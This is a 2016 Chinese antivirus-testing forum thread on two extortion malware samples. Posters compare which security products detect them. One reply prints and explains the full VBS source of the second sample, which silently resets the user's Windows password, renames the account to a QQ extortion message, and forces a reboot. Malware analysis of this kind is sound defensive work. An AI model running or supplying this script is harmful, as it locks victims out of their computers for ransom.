两个敲竹杠

显示全部楼层 · 发表于 2016-7-2 19:50:29

蜘蛛扫描miss
实机双击全miss不过我是win10在线账户

显示全部楼层 · 发表于 2016-7-2 20:15:18

3801187 发表于 2016-7-2 19:19
第二个双击过大BD

JS过了BD

显示全部楼层 · 发表于 2016-7-2 20:15:58

共和时代发表于 2016-7-2 19:47
测试：AVG，诺顿，360卫士。火绒，q管，百度，金山
断网下：火绒查到2个但是防御失败
联网下：火绒同上， ...

360第二个能成功防御吗？

显示全部楼层 · 发表于 2016-7-2 20:18:57

第二个过这么多？
哪位大神来解释下原理
@驭龙@lixihong10@aboringman@vm001@翼风Fly@蓝天二号@jasonliul@nick20010117@900703
@大法好

显示全部楼层 · 发表于 2016-7-2 20:45:37

windows7爱好者发表于 2016-7-2 20:18
第二个过这么多？
哪位大神来解释下原理
@驭龙@lixihong10@aboringman@vm001@翼风Fly@蓝天二号@jasonliul ...

我對這種索機軟體不懂另外@都失敗囉

@驭龙@lixihong10 @aboringman @vm001 @翼风Fly @蓝天二号 @jasonliul @nick20010117

显示全部楼层 · 发表于 2016-7-2 21:58:08

第一个报毒

第二个

显示全部楼层 · 发表于 2016-7-2 22:04:10

DPT1 发表于 2016-7-2 21:58
第一个报毒

第二个

毒霸这波可以啊，秒杀好多杀软

显示全部楼层 · 发表于 2016-7-2 22:47:08

KIS 双击miss all

显示全部楼层 · 发表于 2016-7-2 22:52:57

windows7爱好者发表于 2016-7-2 20:15
360第二个能成功防御吗？

解压立即报，脚本直接入库

显示全部楼层 · 发表于 2016-7-2 23:01:46

900703 发表于 2016-7-2 20:45
我對這種索機軟體不懂另外@都失敗囉

@驭龙@lixihong10 @aboringman @vm001 @翼风Fly @蓝天二 ...

呼叫成功

看了看第二个，vbs文件：
[mw_shl_code=javascript,true] On Error Resume Next
Dim fso,ws,file,shut,password
password="wslk321"
Set fso=Wscript.CreateObject("Scripting.FileSystemObject")
Set ws=Wscript.CreateObject("Wscript.Shell")
fol=fso.GetSpecialFolder(1)
file=fol & "\net.exe"
shut=fol & "\shutdown.exe"
ws.run file & " user %UserName% "+Chr(34) & password & Chr(34),0,True
'上面一行实质调用了 net user
ws.Run "wmic.exe useraccount where name='%username%' call Rename ""加QQ教你破解：1785985366"+Chr(34),0,True
'用户改名
ws.run shut & " /r /f /t 0",0
'关机走人，用户就只能乖乖的开机交钱
[/mw_shl_code]
非常显而易见，如8楼所述，密码是wslk321
调用了net、wmic命令创建加密的用户，shut可能部分杀软来不及拦截
单步拆开看没有什么威胁，整体来说也不会对系统有什么破坏，也就是骗骗小白而已

[病毒样本] 两个敲竹杠

本帖子中包含更多资源

评分

浏览过的版块